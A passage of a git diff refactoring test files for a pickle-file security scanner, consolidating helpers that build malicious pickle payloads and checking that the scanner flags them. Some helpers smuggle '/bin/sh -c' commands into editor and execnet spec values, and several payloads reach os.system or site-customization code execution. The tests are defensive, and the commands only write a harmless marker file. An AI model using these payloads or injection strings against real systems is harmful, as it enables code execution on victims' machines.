test_assignment_alias_limit_preserves_later_entrypoint_finding( ) -> None: reference = {"module": "constructor", "name": "Type"} - def _iter_references( - _import_references: object, - _callable_references: tuple[dict[str, object], ...], - _invoked_references: set[tuple[str, str]], - ) -> tuple[dict[str, str], ...]: - return (reference,) + _iter_references = _reference_callback(reference) def _entrypoints(_module: str, _name: str, _reference: dict[str, object]) -> tuple[str, ...]: return ("constructor.Type.__new__", "constructor.Type.__init__") @@ -1017,91 +905,13 @@ def _path(entrypoint: str) -> tuple[str, ...] | None: def test_assignment_alias_limit_preserves_prior_startup_hook_findings( monkeypatch: pytest.MonkeyPatch, ) -> None: - references = ( - {"module": "opener", "name": "entry"}, - {"module": "writer", "name": "entry"}, - {"module": "limited", "name": "entry"}, - ) - - def _entrypoints(function_name: str) -> tuple[str, ...]: - if function_name == "limited.entry": - raise _CallGraphAnalysisLimitError("assignment alias limit") - return (function_name,) - - def _path(entrypoints: Iterable[str], path_for: object) -> tuple[str, ...] | None: - entrypoint = next(iter(entrypoints)) - path_name = getattr(path_for, "__name__", "") - if path_name == "_find_file_open_path" and entrypoint == "opener.entry": - return ("opener.entry", "builtins.open") - if path_name == "_find_file_write_path" and entrypoint == "writer.entry": - return ("writer.entry", "binary_file.write") - return None - - monkeypatch.setattr("modelaudit_picklescan.call_graph._safe_call_graph_entrypoints", _entrypoints) - monkeypatch.setattr("modelaudit_picklescan.call_graph._first_matching_path", _path) - - with pytest.raises(_CallGraphAnalysisLimitError, match="assignment alias limit") as exc_info: - find_startup_hook_write_call_graphs(references) - - assert exc_info.value.partial_startup_hook_write_findings == ( - StartupHookWriteFinding( - opener_module="opener", - opener_name="entry", - writer_module="writer", - writer_name="entry", - opener_import_reference="opener.entry", - writer_import_reference="writer.entry", - open_sink="builtins.open", - write_sink="binary_file.write", - opener_call_path=("opener.entry", "builtins.open"), - writer_call_path=("writer.entry", "binary_file.write"), - ), - ) + _assert_alias_limit_startup_findings(monkeypatch, "opener", "writer", "limited") def test_assignment_alias_limit_preserves_later_startup_hook_findings( monkeypatch: pytest.MonkeyPatch, ) -> None: - references = ( - {"module": "limited", "name": "entry"}, - {"module": "opener", "name": "entry"}, - {"module": "writer", "name": "entry"}, - ) - - def _entrypoints(function_name: str) -> tuple[str, ...]: - if function_name == "limited.entry": - raise _CallGraphAnalysisLimitError("assignment alias limit") - return (function_name,) - - def _path(entrypoints: Iterable[str], path_for: object) -> tuple[str, ...] | None: - entrypoint = next(iter(entrypoints)) - path_name = getattr(path_for, "__name__", "") - if path_name == "_find_file_open_path" and entrypoint == "opener.entry": - return ("opener.entry", "builtins.open") - if path_name == "_find_file_write_path" and entrypoint == "writer.entry": - return ("writer.entry", "binary_file.write") - return None - - monkeypatch.setattr("modelaudit_picklescan.call_graph._safe_call_graph_entrypoints", _entrypoints) - monkeypatch.setattr("modelaudit_picklescan.call_graph._first_matching_path", _path) - - with pytest.raises(_CallGraphAnalysisLimitError, match="assignment alias limit") as exc_info: - find_startup_hook_write_call_graphs(references) - - assert exc_info.value.partial_startup_hook_write_findings == ( - StartupHookWriteFinding( - opener_module="opener", - opener_name="entry", - writer_module="writer", - writer_name="entry", - opener_import_reference="opener.entry", - writer_import_reference="writer.entry", - open_sink="builtins.open", - write_sink="binary_file.write", - opener_call_path=("opener.entry", "builtins.open"), - writer_call_path=("writer.entry", "binary_file.write"), - ), - ) + _assert_alias_limit_startup_findings(monkeypatch, "limited", "opener", "writer") def test_assignment_alias_limit_preserves_startup_hook_findings_after_sink_limit( @@ -1177,3 +987,111 @@ def _scan() -> None: report = result["report"] severities = {finding.severity for finding in report.findings} assert Severity.CRITICAL in severities + + +def _startup_hook_path(entrypoints: Iterable[str], path_for: object) -> tuple[str, ...] | None: + entrypoint = next(iter(entrypoints)) + path_name = getattr(path_for, "__name__", "") + if path_name == "_find_file_open_path" and entrypoint == "opener.entry": + return ("opener.entry", "builtins.open") + if path_name == "_find_file_write_path" and entrypoint == "writer.entry": + return ("writer.entry", "binary_file.write") + return None + + +def _assignment_alias_limit_path(entrypoints: Iterable[str], _path_for: object) -> tuple[str, ...] | None: + if tuple(entrypoints) == ("limited.entry",): + raise _CallGraphAnalysisLimitError("assignment alias limit") + return ("dangerous.entry", "builtins.exec") + + +def _assignment_alias_limit_entrypoints(function_name: str) -> tuple[str, ...]: + if function_name == "limited.entry": + raise _CallGraphAnalysisLimitError("assignment alias limit") + return (function_name,) + + +def _assert_alias_limit_findings(monkeypatch: pytest.MonkeyPatch, first_module: str, second_module: str) -> None: + references = ( + {"module": first_module, "name": "entry"}, + {"module": second_module, "name": "entry"}, + ) + + _iter_references = _reference_callback(references) + + def _entrypoints(module: str, name: str, _reference: dict[str, object]) -> tuple[str, ...]: + return (f"{module}.{name}",) + + monkeypatch.setattr("modelaudit_picklescan.call_graph._iter_call_graph_references", _iter_references) + monkeypatch.setattr("modelaudit_picklescan.call_graph._call_graph_entrypoints_for_reference", _entrypoints) + monkeypatch.setattr("modelaudit_picklescan.call_graph._first_matching_path", _assignment_alias_limit_path) + + with pytest.raises(_CallGraphAnalysisLimitError, match="assignment alias limit") as exc_info: + find_dangerous_call_graphs(()) + + assert exc_info.value.partial_findings == ( + CallGraphFinding( + module="dangerous", + name="entry", + import_reference="dangerous.entry", + sink="builtins.exec", + call_path=("dangerous.entry", "builtins.exec"), + ), + ) + + +def _assert_alias_limit_startup_findings( + monkeypatch: pytest.MonkeyPatch, first_module: str, second_module: str, third_module: str +) -> None: + references = ( + {"module": first_module, "name": "entry"}, + {"module": second_module, "name": "entry"}, + {"module": third_module, "name": "entry"}, + ) + + monkeypatch.setattr( + "modelaudit_picklescan.call_graph._safe_call_graph_entrypoints", _assignment_alias_limit_entrypoints + ) + monkeypatch.setattr("modelaudit_picklescan.call_graph._first_matching_path", _startup_hook_path) + + with pytest.raises(_CallGraphAnalysisLimitError, match="assignment alias limit") as exc_info: + find_startup_hook_write_call_graphs(references) + + assert exc_info.value.partial_startup_hook_write_findings == ( + StartupHookWriteFinding( + opener_module="opener", + opener_name="entry", + writer_module="writer", + writer_name="entry", + opener_import_reference="opener.entry", + writer_import_reference="writer.entry", + open_sink="builtins.open", + write_sink="binary_file.write", + opener_call_path=("opener.entry", "builtins.open"), + writer_call_path=("writer.entry", "binary_file.write"), + ), + ) + + +def _assert_alias_collection_limited( + statements: Iterable[ast.stmt], + local_defs: set[str], + local_class_targets: set[str], + match: str | None = None, +) -> None: + result: dict[str, bool] = {} + + def _collect() -> None: + with pytest.raises(_CallGraphAnalysisLimitError, match=match): + _collect_assignment_aliases( + statements, + "testmod", + {}, + local_defs, + local_class_targets, + ) + result["limited"] = True + + _run_with_timeout(_collect) + + assert result == {"limited": True} diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_click.py b/packages/modelaudit-picklescan/tests/test_call_graph_click.py index 625a8077a..a1c77a656 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_click.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_click.py @@ -9,8 +9,14 @@ from pathlib import Path import pytest - -from modelaudit_picklescan import PickleReport, SafetyVerdict, Severity, scan_bytes +from pickle_test_helpers import ( + _global_operand, + _has_critical_call_graph_finding, + _text_operand, + _tuple_payload_operands, +) + +from modelaudit_picklescan import SafetyVerdict, scan_bytes from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE from modelaudit_picklescan.call_graph import _calls_for_function, _find_sink_path @@ -26,31 +32,6 @@ ] -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _global_operand(module: str, name: str) -> bytes: - return _text_operand(module) + _text_operand(name) + b"\x93" - - -def _tuple_payload_operands(operands: list[bytes]) -> bytes: - return b"(" + b"".join(operands) + b"t" - - def _click_editor(marker: Path, marker_content: str) -> str: command = f"printf {shlex.quote(marker_content)} > {shlex.quote(str(marker))} #" return f"/bin/sh -c {shlex.quote(command)}" @@ -81,17 +62,6 @@ def _click_edit_payload(marker: Path) -> tuple[bytes, str, str]: return payload, marker_content, editor -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def test_call_graph_resolves_function_local_class_instance_aliases() -> None: calls = _calls_for_function("click.edit") assert calls is not None diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_execnet.py b/packages/modelaudit-picklescan/tests/test_call_graph_execnet.py index 3dd81aa03..6f6b61c15 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_execnet.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_execnet.py @@ -9,8 +9,14 @@ from pathlib import Path import pytest - -from modelaudit_picklescan import PickleReport, SafetyVerdict, Severity, scan_bytes +from pickle_test_helpers import ( + _global_operand, + _has_critical_call_graph_finding, + _text_operand, + _tuple_payload_operands, +) + +from modelaudit_picklescan import SafetyVerdict, scan_bytes from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE from modelaudit_picklescan.call_graph import _call_graph_entrypoints, _find_sink_path @@ -26,31 +32,6 @@ ] -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _global_operand(module: str, name: str) -> bytes: - return _text_operand(module) + _text_operand(name) + b"\x93" - - -def _tuple_payload_operands(operands: list[bytes]) -> bytes: - return b"(" + b"".join(operands) + b"t" - - def _execnet_spec(marker: Path, marker_content: str) -> str: command = f"printf {shlex.quote(marker_content)} > {shlex.quote(str(marker))} #" return f"popen//python=/bin/sh -c {shlex.quote(command)}" @@ -74,17 +55,6 @@ def _execnet_makegateway_payload(marker: Path) -> tuple[bytes, str, str]: return payload, marker_content, spec -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def test_call_graph_resolves_execnet_bound_method_process_dispatch() -> None: assert _call_graph_entrypoints("execnet.makegateway") == ("execnet.multi.Group.makegateway",) diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_import_statements.py b/packages/modelaudit-picklescan/tests/test_call_graph_import_statements.py index 1691e65e3..801835e55 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_import_statements.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_import_statements.py @@ -28,9 +28,17 @@ from pathlib import Path from types import FunctionType from typing import Any +from unittest.mock import create_autospec from zipimport import zipimporter import pytest +from pickle_test_helpers import ( + _bytes_operand, + _clear_call_graph_caches, + _global_operand, + _has_critical_call_graph_finding, +) +from pickle_test_helpers import _text_operand as _unicode_operand import modelaudit_picklescan.api as api_module import modelaudit_picklescan.call_graph as call_graph @@ -42,29 +50,6 @@ ) -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _unicode_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return b"X" + len(data).to_bytes(4, "little") + data - - -def _bytes_operand(value: bytes) -> bytes: - if len(value) <= 0xFF: - return b"C" + bytes([len(value)]) + value - return b"B" + len(value).to_bytes(4, "little") + value - - -def _global_operand(module: str, name: str) -> bytes: - return _unicode_operand(module) + _unicode_operand(name) + b"\x93" - - def _args_tuple(*arg_operands: bytes) -> bytes: if not arg_operands: return b")" @@ -83,11 +68,6 @@ def _global_call_payload(module: str, name: str, *arg_operands: bytes) -> bytes: return b"".join([b"\x80\x04", _global_operand(module, name), _args_tuple(*arg_operands), b"R."]) -def _clear_call_graph_caches() -> None: - for function in call_graph._SOURCE_SENSITIVE_CACHED_FUNCTIONS: - function.cache_clear() - - def test_wildcard_summary_and_analysis_share_module_parse( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, @@ -114,11 +94,7 @@ def tracking_parse(source_code: str, filename: str = "") -> ast.Module: def test_shared_source_sensitive_caches_clears_once_per_scope(monkeypatch: pytest.MonkeyPatch) -> None: - clear_count = 0 - - def fake_clear() -> None: - nonlocal clear_count - clear_count += 1 + fake_clear = create_autospec(lambda: None, return_value=None) monkeypatch.setattr(call_graph, "_clear_source_sensitive_caches_now", fake_clear) @@ -127,10 +103,10 @@ def fake_clear() -> None: call_graph._clear_source_sensitive_caches() call_graph._clear_source_sensitive_caches() - assert clear_count == 1 + assert fake_clear.call_count == 1 call_graph._clear_source_sensitive_caches() - assert clear_count == 2 + assert fake_clear.call_count == 2 def test_shared_source_snapshot_tracks_large_extension_candidates_by_presence( @@ -379,13 +355,9 @@ def test_unresolved_framework_reconstruction_reference_requires_origin_review( def test_shared_source_sensitive_caches_allows_inherited_worker_scopes( monkeypatch: pytest.MonkeyPatch, ) -> None: - clear_count = 0 + fake_clear = create_autospec(lambda: None, return_value=None) worker_entered = threading.Event() - def fake_clear() -> None: - nonlocal clear_count - clear_count += 1 - def enter_worker_scope() -> None: with call_graph.shared_source_sensitive_caches(): call_graph._clear_source_sensitive_caches() @@ -400,12 +372,12 @@ def enter_worker_scope() -> None: assert worker_entered.wait(timeout=1) worker.join(timeout=1) assert not worker.is_alive() - assert clear_count == 1 + assert fake_clear.call_count == 1 with call_graph.shared_source_sensitive_caches(): pass - assert clear_count == 2 + assert fake_clear.call_count == 2 def test_shared_source_sensitive_caches_serializes_inherited_worker_work() -> None: @@ -444,14 +416,10 @@ def enter_second_scope() -> None: def test_shared_source_sensitive_caches_serializes_independent_scopes( monkeypatch: pytest.MonkeyPatch, ) -> None: - clear_count = 0 + fake_clear = create_autospec(lambda: None, return_value=None) worker_started = threading.Event() worker_entered = threading.Event() - def fake_clear() -> None: - nonlocal clear_count - clear_count += 1 - def enter_worker_scope() -> None: worker_started.set() with call_graph.shared_source_sensitive_caches(): @@ -468,7 +436,7 @@ def enter_worker_scope() -> None: assert worker_entered.wait(timeout=1) worker.join(timeout=1) assert not worker.is_alive() - assert clear_count == 2 + assert fake_clear.call_count == 2 def test_shared_source_sensitive_caches_refreshes_between_outer_scopes( @@ -1675,25 +1643,7 @@ def _chainmap_defaultdict_str_format_payload(*, key: str, format_string: str) -> def _nested_defaultdict_str_format_payload() -> bytes: - return b"".join( - [ - b"\x80\x04", - _global_operand("collections", "defaultdict"), - _global_operand("builtins", "help"), - b"\x85R", - b"\x94", - b"0", - b"}", - b"\x94", - _unicode_operand("present"), - b"h\x00", - b"s", - b"0", - _global_operand("builtins", "str.format"), - _args_tuple(_unicode_operand("{0[present][missing]}"), b"h\x01"), - b"R.", - ] - ) + return _nested_defaultdict_format_payload(method_name="str.format", template="{0[present][missing]}") def _nested_setitems_defaultdict_str_format_payload() -> bytes: @@ -1720,25 +1670,7 @@ def _nested_setitems_defaultdict_str_format_payload() -> bytes: def _nested_defaultdict_format_map_payload() -> bytes: - return b"".join( - [ - b"\x80\x04", - _global_operand("collections", "defaultdict"), - _global_operand("builtins", "help"), - b"\x85R", - b"\x94", - b"0", - b"}", - b"\x94", - _unicode_operand("present"), - b"h\x00", - b"s", - b"0", - _global_operand("builtins", "str.format_map"), - _args_tuple(_unicode_operand("{present[missing]}"), b"h\x01"), - b"R.", - ] - ) + return _nested_defaultdict_format_payload(method_name="str.format_map", template="{present[missing]}") def _nested_defaultdict_formatter_payload(method_name: str) -> bytes: @@ -1913,17 +1845,6 @@ def _typing_extensions_get_type_hints_payload(marker: Path) -> bytes: ) -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def _has_call_graph_source_unavailable_notice( report: PickleReport, module: str, @@ -2207,22 +2128,11 @@ def test_call_graph_fails_closed_when_custom_finder_can_shadow_frozen_function_b pytest.skip("ntpath is not frozen on this interpreter") marker = tmp_path / "meta_path_called" - class CustomMetaPathFinder: - @staticmethod - def find_spec( - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del path, target - if fullname == "ntpath": - marker.write_text(fullname, encoding="utf-8") - return ModuleSpec(fullname, loader=None, origin="custom://module") - return None + finder = _custom_meta_path_finder("ntpath", marker) with monkeypatch.context() as context: context.delitem(sys.modules, "ntpath", raising=False) - context.setattr(sys, "meta_path", [CustomMetaPathFinder(), *sys.meta_path]) + context.setattr(sys, "meta_path", [finder, *sys.meta_path]) _clear_call_graph_caches() try: @@ -2389,21 +2299,10 @@ def test_scan_bytes_fails_closed_when_custom_meta_path_finder_can_shadow_source( (module_dir / f"{module_name}.py").write_text("def invoke(command):\n return command\n", encoding="utf-8") marker = tmp_path / "meta_path_called" - class CustomMetaPathFinder: - @staticmethod - def find_spec( - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del path, target - if fullname == module_name: - marker.write_text(fullname, encoding="utf-8") - return ModuleSpec(fullname, loader=None, origin="custom://module") - return None + finder = _custom_meta_path_finder(module_name, marker) monkeypatch.syspath_prepend(str(module_dir)) - monkeypatch.setattr(sys, "meta_path", [CustomMetaPathFinder(), *sys.meta_path]) + monkeypatch.setattr(sys, "meta_path", [finder, *sys.meta_path]) importlib.invalidate_caches() _clear_call_graph_caches() @@ -2542,20 +2441,9 @@ def test_scan_bytes_keeps_frozen_stdlib_globals_clean_without_custom_meta_path_f module_name = "_frozen_importlib" marker = tmp_path / "meta_path_called" - class CustomMetaPathFinder: - @staticmethod - def find_spec( - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del path, target - if fullname == module_name: - marker.write_text(fullname, encoding="utf-8") - return ModuleSpec(fullname, loader=None, origin="custom://module") - return None + finder = _custom_meta_path_finder(module_name, marker) - monkeypatch.setattr(sys, "meta_path", [CustomMetaPathFinder(), *sys.meta_path]) + monkeypatch.setattr(sys, "meta_path", [finder, *sys.meta_path]) _clear_call_graph_caches() try: @@ -2584,21 +2472,10 @@ def test_call_graph_fails_closed_when_custom_meta_path_finder_can_shadow_frozen_ module_name = "__hello__" marker = tmp_path / "meta_path_called" - class CustomMetaPathFinder: - @staticmethod - def find_spec( - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del path, target - if fullname == module_name: - marker.write_text(fullname, encoding="utf-8") - return ModuleSpec(fullname, loader=None, origin="custom://module") - return None + finder = _custom_meta_path_finder(module_name, marker) monkeypatch.delitem(sys.modules, module_name, raising=False) - monkeypatch.setattr(sys, "meta_path", [CustomMetaPathFinder(), *sys.meta_path]) + monkeypatch.setattr(sys, "meta_path", [finder, *sys.meta_path]) _clear_call_graph_caches() try: @@ -2633,20 +2510,9 @@ def test_scan_bytes_marks_custom_meta_path_specs_as_unanalyzable_without_invokin module_name = "modelaudit_tp_meta_path_spec_probe" marker = tmp_path / "meta_path_called" - class CustomMetaPathFinder: - @staticmethod - def find_spec( - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del path, target - if fullname == module_name: - marker.write_text(fullname, encoding="utf-8") - return ModuleSpec(fullname, loader=None, origin="custom://module") - return None + finder = _custom_meta_path_finder(module_name, marker) - monkeypatch.setattr(sys, "meta_path", [CustomMetaPathFinder(), *sys.meta_path]) + monkeypatch.setattr(sys, "meta_path", [finder, *sys.meta_path]) _clear_call_graph_caches() try: @@ -2973,64 +2839,30 @@ def test_scan_bytes_refreshes_call_graph_after_source_rewrite( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - module_name = "modelaudit_tp_rewritten_call_graph_source" - module_path = module_dir / f"{module_name}.py" - module_path.write_text("def invoke(command):\n return command\n", encoding="utf-8") - monkeypatch.syspath_prepend(str(module_dir)) - importlib.invalidate_caches() - _clear_call_graph_caches() - payload = _global_call_payload(module_name, "invoke", _unicode_operand("echo rewritten")) - - try: - safe_report = scan_bytes(payload, source="rewritten-call-graph-safe.pkl") - - module_path.write_text( - "import os\n\ndef invoke(command):\n return os.system(command)\n", - encoding="utf-8", - ) - importlib.invalidate_caches() - dangerous_report = scan_bytes(payload, source="rewritten-call-graph-dangerous.pkl") - finally: - _clear_call_graph_caches() - - assert safe_report.verdict == SafetyVerdict.SUSPICIOUS - assert not _has_critical_call_graph_finding(safe_report, module_name, "invoke", "os.system") - assert dangerous_report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding(dangerous_report, module_name, "invoke", "os.system") + _assert_rewritten_call_graph( + tmp_path, + monkeypatch, + "modelaudit_tp_rewritten_call_graph_source", + "rewritten-call-graph-safe.pkl", + "import os\n\ndef invoke(command):\n return os.system(command)\n", + "rewritten-call-graph-dangerous.pkl", + "os.system", + ) def test_scan_bytes_refreshes_invoked_import_fallback_after_source_rewrite( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - module_name = "modelaudit_tp_rewritten_invoked_import_source" - module_path = module_dir / f"{module_name}.py" - module_path.write_text("def invoke(command):\n return command\n", encoding="utf-8") - monkeypatch.syspath_prepend(str(module_dir)) - importlib.invalidate_caches() - _clear_call_graph_caches() - payload = _global_call_payload(module_name, "invoke", _unicode_operand("echo rewritten")) - - try: - safe_report = scan_bytes(payload, source="rewritten-invoked-import-safe.pkl") - - module_path.write_text( - "def invoke(command):\n import modelaudit_tp_invoked_import_dependency\n return command\n", - encoding="utf-8", - ) - importlib.invalidate_caches() - dangerous_report = scan_bytes(payload, source="rewritten-invoked-import-dangerous.pkl") - finally: - _clear_call_graph_caches() - - assert safe_report.verdict == SafetyVerdict.SUSPICIOUS - assert not _has_critical_call_graph_finding(safe_report, module_name, "invoke", "builtins.__import__") - assert dangerous_report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding(dangerous_report, module_name, "invoke", "builtins.__import__") + _assert_rewritten_call_graph( + tmp_path, + monkeypatch, + "modelaudit_tp_rewritten_invoked_import_source", + "rewritten-invoked-import-safe.pkl", + "def invoke(command):\n import modelaudit_tp_invoked_import_dependency\n return command\n", + "rewritten-invoked-import-dangerous.pkl", + "builtins.__import__", + ) def test_startup_hook_write_call_graph_refreshes_after_source_rewrite( @@ -3080,14 +2912,7 @@ def test_startup_hook_write_call_graph_refreshes_after_source_rewrite( def test_call_graph_propagates_wrapper_import_execution_fallbacks() -> None: - calls = call_graph._calls_for_function("platform.mac_ver") or () - - assert "platform._mac_ver_xml" in calls - assert call_graph._find_sink_path("platform.mac_ver") == ( - "platform.mac_ver", - "platform._mac_ver_xml", - "builtins.__import__", - ) + _assert_wrapper_import_fallback("platform.mac_ver", "platform._mac_ver_xml", "builtins.__import__") def test_call_graph_ignores_imports_inside_nested_functions_until_called() -> None: @@ -3098,29 +2923,13 @@ def test_call_graph_ignores_imports_inside_nested_functions_until_called() -> No def test_call_graph_models_getattr_default_callable_fallbacks() -> None: - calls = call_graph._calls_for_function("platform._Processor.get") or () - - assert "platform._Processor.from_subprocess" in calls - assert call_graph._find_sink_path("platform._Processor.get") == ( - "platform._Processor.get", - "platform._Processor.from_subprocess", - "subprocess.check_output", + _assert_wrapper_import_fallback( + "platform._Processor.get", "platform._Processor.from_subprocess", "subprocess.check_output" ) def _is_typing_readonly_guard(statement: ast.stmt) -> bool: - if not isinstance(statement, ast.If) or not isinstance(statement.test, ast.Call): - return False - test = statement.test - return ( - isinstance(test.func, ast.Name) - and test.func.id == "hasattr" - and len(test.args) == 2 - and isinstance(test.args[0], ast.Name) - and test.args[0].id == "typing" - and isinstance(test.args[1], ast.Constant) - and test.args[1].value == "ReadOnly" - ) + return _is_module_attribute_guard(statement, module_name="typing", attribute_name="ReadOnly") def _is_typing_get_type_hints_guard(statement: ast.stmt) -> bool: @@ -3142,18 +2951,7 @@ def _is_typing_get_type_hints_guard(statement: ast.stmt) -> bool: def _is_builtin_sentinel_guard(statement: ast.stmt) -> bool: - if not isinstance(statement, ast.If) or not isinstance(statement.test, ast.Call): - return False - test = statement.test - return ( - isinstance(test.func, ast.Name) - and test.func.id == "hasattr" - and len(test.args) == 2 - and isinstance(test.args[0], ast.Name) - and test.args[0].id == "builtins" - and isinstance(test.args[1], ast.Constant) - and test.args[1].value == "sentinel" - ) + return _is_module_attribute_guard(statement, module_name="builtins", attribute_name="sentinel") def test_runtime_guard_selects_live_typing_extensions_export() -> None: @@ -4084,116 +3882,34 @@ def test_scan_bytes_uses_torch_module_lifecycle_entrypoints_for_newobj() -> None def test_call_graph_models_builtin_format_protocol_dispatch_invocations() -> None: - import_references = [ - { - "module": "ipaddress", - "name": "IPv4Address", - "import_reference": "ipaddress.IPv4Address", - }, - { - "module": "builtins", - "name": "format", - "import_reference": "builtins.format", - }, - ] - direct_invocations = [ - { - "module": "ipaddress", - "name": "IPv4Address", - "positional_arg_count": 1, - }, - { - "module": "builtins", - "name": "format", - "positional_arg_count": 2, - }, - ] - protocol_invocations = [ - *direct_invocations, - { - "module": "ipaddress", - "name": "IPv4Address.__format__", - "positional_arg_count": 1, - }, - ] + _assert_format_protocol_dispatch("format") - assert call_graph.find_dangerous_call_graphs(import_references, direct_invocations) == () - findings = call_graph.find_dangerous_call_graphs(import_references, protocol_invocations) +def test_call_graph_models_str_format_protocol_dispatch_invocations() -> None: + _assert_format_protocol_dispatch("str.format") - assert len(findings) == 1 - assert findings[0].module == "ipaddress" - assert findings[0].name == "IPv4Address.__format__" - assert findings[0].sink == "builtins.__import__" - assert findings[0].call_path == ("ipaddress.IPv4Address.__format__", "builtins.__import__") - -def test_call_graph_models_str_format_protocol_dispatch_invocations() -> None: - import_references = [ - { - "module": "ipaddress", - "name": "IPv4Address", - "import_reference": "ipaddress.IPv4Address", - }, - { - "module": "builtins", - "name": "str.format", - "import_reference": "builtins.str.format", - }, - ] - direct_invocations = [ - { - "module": "ipaddress", - "name": "IPv4Address", - "positional_arg_count": 1, - }, - { - "module": "builtins", - "name": "str.format", - "positional_arg_count": 2, - }, - ] - protocol_invocations = [ - *direct_invocations, - { - "module": "ipaddress", - "name": "IPv4Address.__format__", - "positional_arg_count": 1, - }, - ] - - assert call_graph.find_dangerous_call_graphs(import_references, direct_invocations) == () - - findings = call_graph.find_dangerous_call_graphs(import_references, protocol_invocations) - - assert len(findings) == 1 - assert findings[0].module == "ipaddress" - assert findings[0].name == "IPv4Address.__format__" - assert findings[0].sink == "builtins.__import__" - assert findings[0].call_path == ("ipaddress.IPv4Address.__format__", "builtins.__import__") - - -@pytest.mark.parametrize( - ("helper_name", "module_name", "marker_content"), - [ - ("execsitecustomize", "sitecustomize", "sitecustomize-owned"), - ("execusercustomize", "usercustomize", "usercustomize-owned"), - ], -) -def test_scan_bytes_blocks_site_customization_import_execution_rce( - tmp_path: Path, - helper_name: str, - module_name: str, - marker_content: str, -) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - marker = tmp_path / f"{module_name}_marker" - (module_dir / f"{module_name}.py").write_text( - f"from pathlib import Path\nPath({str(marker)!r}).write_text({marker_content!r})\n", - encoding="utf-8", - ) - payload = _global_call_payload("site", helper_name) +@pytest.mark.parametrize( + ("helper_name", "module_name", "marker_content"), + [ + ("execsitecustomize", "sitecustomize", "sitecustomize-owned"), + ("execusercustomize", "usercustomize", "usercustomize-owned"), + ], +) +def test_scan_bytes_blocks_site_customization_import_execution_rce( + tmp_path: Path, + helper_name: str, + module_name: str, + marker_content: str, +) -> None: + module_dir = tmp_path / "modules" + module_dir.mkdir() + marker = tmp_path / f"{module_name}_marker" + (module_dir / f"{module_name}.py").write_text( + f"from pathlib import Path\nPath({str(marker)!r}).write_text({marker_content!r})\n", + encoding="utf-8", + ) + payload = _global_call_payload("site", helper_name) report = scan_bytes(payload, source=f"site-{helper_name}-import-rce.pkl") @@ -4224,16 +3940,10 @@ def test_scan_bytes_blocks_site_customization_import_execution_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), module_name, marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -4290,16 +4000,9 @@ def test_scan_bytes_blocks_sitebuiltins_helper_callable_instance_import_rce(tmp_ if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == 